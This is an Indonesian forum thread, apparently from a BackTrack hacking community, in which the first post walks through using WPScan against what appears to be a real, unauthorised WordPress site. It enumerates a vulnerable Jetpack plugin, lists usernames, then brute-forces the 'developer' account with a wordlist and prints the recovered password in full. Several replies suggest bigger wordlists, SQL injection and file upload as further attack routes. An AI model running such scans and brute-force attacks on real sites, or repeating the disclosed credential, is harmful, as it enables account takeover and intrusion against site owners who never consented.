> > > >


Enumerate wordpress site dengan wpsan.rb
RieqyNS13 Offline
Beginner
21 - 74
#1
Tongue  12-30-2012, 11:49 PM
gak usah kebanyakan bacot g4n:tkp::tkp:
ane ini asli tulis sendiri :-bd

1. buka wpscan.rb ( /pentest/web/wpscan )
2. ketik wpscan.rb ,,trus enter. biasanya ditanya mw update atau kagak,,klo kagak ente ketik n klo mw update ketik y.
[*]klo bromilih y,trus udah selesai updatenya,,biasanyw muncul error kya gini pas buka wpscan.rb
Code:
root@bt:/pentest/web/wpscan# ./wpscan.rb -h
[ERROR] Install missing ruby gem. Please see README file or http://code.google.com/p/wpscan/
#<LoadError: no such file to load -- nokogiri>
solusinya udah ada di error messagenya bro -_- :
Code:
gem install --user-install nokogiri
Code:
root@bt:/pentest/web/wpscan# gem install --user-install nokogiri
WARNING:  You don't have /root/.gem/ruby/1.9.2/bin in your PATH,
      gem executables will not run.
Building native extensions.  This could take a while...
Successfully installed nokogiri-1.5.2
1 gem installed
Installing ri documentation for nokogiri-1.5.2...
Installing RDoc documentation for nokogiri-1.5.2...

3. Ketik ./wpscan.rb atau ./wpscan.rb --help
Code:
____________________________________________________
__          _______   _____                  
\ \        / /  __ \ / ____|                
  \ \  /\  / /| |__) | (___   ___  __ _ _ __  
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v1.1r425

    WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan

Help :

Some values are settable in conf/browser.conf.json :
  user-agent, proxy, threads, cache timeout and request timeout

--update   Update to the latest revision
--url   | -u <target url>  The WordPress URL/domain to scan.
--force | -f Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)]  Enumeration.
  option :
    u        usernames from id 1 to 10
    u[10-20] usernames from id 10 to 20 (you must write [] chars)
    p        plugins
    p!       only vulnerable plugins
    t        timthumbs
  Multiple values are allowed : '-e tp' will enumerate timthumbs and plugins
  If no option is supplied, the default is 'tup!'

--follow-redirection  If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--wp-content-dir <wp content dir>  WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed
--wp-plugins-dir <wp plugins dir>  Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
--proxy  Supply a proxy in the format host:port (will override the one from conf/browser.conf.json)
--wordlist | -w <wordlist>  Supply a wordlist for the password bruter and do the brute.
--threads  | -t <number of threads>  The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)
--username | -U <username>  Only brute force the supplied username.
--help     | -h This help screen.
--verbose  | -v Verbose output.

. sampe sini brobisa nerusin sendiri kan ? \m/
Klo ada yg belum tw,,ya udah ane ksih tutor sekalian. bgi yg udah tw ngapain ente kemari :-?

4. Masukin url dan pilih option lainnya, misalkan ane mw liat2 pluginnya yg vuln :
Code:
./wpscan.rb --url www.productbestbuy.com --enumerate p!
Code:
root@bt:/pentest/web/wpscan# ./wpscan.rb --url www.productbestbuy.com --enumerate p!
____________________________________________________
__          _______   _____                  
\ \        / /  __ \ / ____|                
  \ \  /\  / /| |__) | (___   ___  __ _ _ __  
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v1.1r425

    WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan

| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 21:54:53 2012

[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator

[+] Enumerating plugins from passive detection ... 2 found :

| Name: amazon-link
| Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/

| Name: jetpack
| Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/

[+] Enumerating installed plugins (only vulnerable ones) ...

Checking for 253 total plugins... 100% complete.

[+] We found 1 plugins:

| Name: jetpack
| Location: http://www.productbestbuy.com/wp-content/plugins/jetpack/
| Directory listing enabled? Yes.
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/

[+] Finished at Sun Dec 30 21:56:44 2012
tu bro, nemu 1 plugin vuln,,malah udah dikasih exploit nya Sad

5. skarang coba ane cari username nya :
Code:
./wpscan.rb --url www.productbestbuy.com --enumerate u
Code:
./wpscan.rb --url www.productbestbuy.com --enumerate u
____________________________________________________
__          _______   _____                  
\ \        / /  __ \ / ____|                
  \ \  /\  / /| |__) | (___   ___  __ _ _ __  
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v1.1r425

    WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan

| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 22:22:31 2012

[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator

[+] Enumerating plugins from passive detection ... 2 found :

| Name: amazon-link
| Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/

| Name: jetpack
| Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/

[+] Enumerating usernames ...

We found the following 2 username/s :

  admin
  developer
ada 2 user bro, admin ama developer
wpscan versi bru aneh,,wong cuma nyari username aja,,pluginnya ikut discan juga :-? (buang2 waktu aja)

6. skarang nyari password nya pke brute force Smile:- , harus sediain wordlist.lst nih berarti Sad( . Wordist ane letaknya di /root/Desktop/wordlist.lst
Code:
./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst
Code:
./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst
____________________________________________________
__          _______   _____                  
\ \        / /  __ \ / ____|                
  \ \  /\  / /| |__) | (___   ___  __ _ _ __  
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v1.1r425

    WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan

| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 22:36:41 2012

[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator

[+] Enumerating plugins from passive detection ...
2 found :

| Name: amazon-link
| Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/

| Name: jetpack
| Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/

[+] Starting the password brute forcer

  Brute forcing user 'developer' with 12 passwords... 58% complete.
  [SUCCESS] Username : developer Password : cisadane123456


[+] Finished at Sun Dec 30 22:38:18 2012
Code:
Username : developer Password : cisadane123456
pic:
[Image: hack_wp.png]

penulis : RieqyNS13
wpscan developer : ethicalhacke3r
403 Forbidden
 
Find
Reply

blAnk_pag3 Offline
learn by doing
2 - 61
#2
12-31-2012, 12:25 PM
Oh iya, gmn kalau passwordnya tidak ada dalam kamus?

ada cara lain ga pake wpscan ini..?
 
Find
Reply

iKONspirasi Offline
Sysadmin
56 - 2,544
#3
12-31-2012, 06:57 PM
(12-31-2012, 12:25 PM)blAnk_pag3 Wrote: Oh iya, gmn kalau passwordnya tidak ada dalam kamus?

ada cara lain ga pake wpscan ini..?

cari kamus yg lebih tebel Big Grin

selain crack password variasi lain jg banyak kok, bisa sqli sampai upload file atau database tergantung vulnerabilitynya dmn, kebanyakan di plugins sih.
I'm @ikonspirasi - Facebook
Personal blog: http://ikonspirasi.net
 
Website Find
Reply

agusst Offline
Banned
0 - 2
#4
01-05-2013, 08:47 AM
oh ya kak wordlist nya untuk crack wifi sama gak ama wordlistnya untuk bruteforce wpscan.rb
 
Find
Reply

betefive Offline
Share
41 - 411
#5
01-05-2013, 09:06 AM
(01-05-2013, 08:47 AM)agusst Wrote: oh ya kak wordlist nya untuk crack wifi sama gak ama wordlistnya untuk bruteforce wpscan.rb

sama kok om, tapi hasil nya ga sama, kalo misal si om berhasil crack wifi dgn wordlist tersebut, tp kalo di wp-scan blum tentu berhasil Smile
sildenafil generique avis pas cher
 
Website Find
Reply

Clound_Carbelius Offline
Wong Cilik
46 - 485
#6
01-05-2013, 09:24 AM
kalo ini erorr knapa ya ? Undecided :-?

PHP Code:
[WARNINGThe SVN repository is DEPRECATED, use the GIT one http://github.com/wpscanteam/wpscan

[ERRORThe optiontimeout is invalid.
Trace : ["/root/.gem/ruby/1.9.2/gems/ethon-0.5.7/lib/ethon/multi.rb:103:in `block in set_attributes'""/root/.gem/ruby/1.9.2/gems/ethon-0.5.7/lib/ethon/multi.rb:101:in `each_pair'""/root/.gem/ruby/1.9.2/gems/ethon-0.5.7/lib/ethon/multi.rb:101:in `set_attributes'""/root/.gem/ruby/1.9.2/gems/ethon-0.5.7/lib/ethon/multi.rb:86:in `initialize'""/root/.gem/ruby/1.9.2/gems/typhoeus-0.5.3/lib/typhoeus/hydra.rb:96:in `new'""/root/.gem/ruby/1.9.2/gems/typhoeus-0.5.3/lib/typhoeus/hydra.rb:96:in `initialize'""/pentest/web/wpscan/lib/browser.rb:49:in `new'""/pentest/web/wpscan/lib/browser.rb:49:in `initialize'""/pentest/web/wpscan/lib/browser.rb:62:in `new'""/pentest/web/wpscan/lib/browser.rb:62:in `instance'""/pentest/web/wpscan/lib/wpscan/wp_target.rb:43:in `initialize'""./wpscan.rb:51:in `new'""./wpscan.rb:51:in `<main>'"
Klik Here

Clound@IBTeam:~#
EMail Me : [email protected]
 
Website Find
Reply

jibril Offline
BT regional jogjakarta
3 - 37
#7
01-07-2013, 07:46 PM
hahahaaa... pernah ane pake ginian gandeng agag bingung rada tak pending eh ada tutor dimari..
sangat berguna lek... Big Grin
Authentic Damsels
 
Website Find
Reply






Users browsing this thread: 1 Guest(s)